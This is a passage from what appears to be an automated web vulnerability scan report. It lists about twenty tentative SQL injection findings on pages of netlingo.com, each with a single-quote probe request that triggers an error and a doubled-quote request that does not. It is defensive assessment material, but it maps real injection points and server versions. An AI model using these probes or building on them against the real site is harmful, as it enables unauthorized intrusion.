The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /category/programming.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /category/programming.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 40843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.76. http://www.netlingo.com/category/software.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/category/software.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /category/software.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /category/software.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 45055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.77. http://www.netlingo.com/category/technology.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/category/technology.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /category/technology.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /category/technology.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 60392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.78. http://www.netlingo.com/contact/contact-us.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/contact/contact-us.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /contact/contact-us.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /contact/contact-us.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34739

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.79. http://www.netlingo.com/contact/linktonetlingo.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/contact/linktonetlingo.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /contact/linktonetlingo.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /contact/linktonetlingo.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.80. http://www.netlingo.com/country.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/country.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /country.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /country.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 36558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.81. http://www.netlingo.com/hello/welcome.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/hello/welcome.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /hello/welcome.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /hello/welcome.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.82. http://www.netlingo.com/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /index.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:47:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /index.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:47:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 46223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.83. http://www.netlingo.com/iphone [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/iphone

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /iphone?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /iphone?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32382

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<
...[SNIP]...

1.84. http://www.netlingo.com/iphone/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/iphone/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /iphone/?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /iphone/?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32382

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<
...[SNIP]...

1.85. http://www.netlingo.com/iphone/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/iphone/index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /iphone/index.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /iphone/index.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32391

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<
...[SNIP]...

1.86. http://www.netlingo.com/more/adsizes.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/more/adsizes.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /more/adsizes.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /more/adsizes.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 29479

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
...[SNIP]...

1.87. http://www.netlingo.com/press/about-netlingo.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/press/about-netlingo.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /press/about-netlingo.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /press/about-netlingo.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 74639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.88. http://www.netlingo.com/press/all-press-clippings.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/press/all-press-clippings.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /press/all-press-clippings.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /press/all-press-clippings.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 82347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.89. http://www.netlingo.com/press/awards.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/press/awards.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /press/awards.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /press/awards.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 33468

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.90. http://www.netlingo.com/press/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/press/index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /press/index.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /press/index.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 33836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.91. http://www.netlingo.com/press/media.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/press/media.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /press/media.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:56:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /press/media.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:56:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 69717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.92. http://www.netlingo.com/press/meet-erin.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/press/meet-erin.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /press/meet-erin.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /press/meet-erin.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 38892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.93. http://www.netlingo.com/press/print.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/press/print.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /press/print.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /press/print.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 101167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.94. http://www.netlingo.com/press/teen-text-talk.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
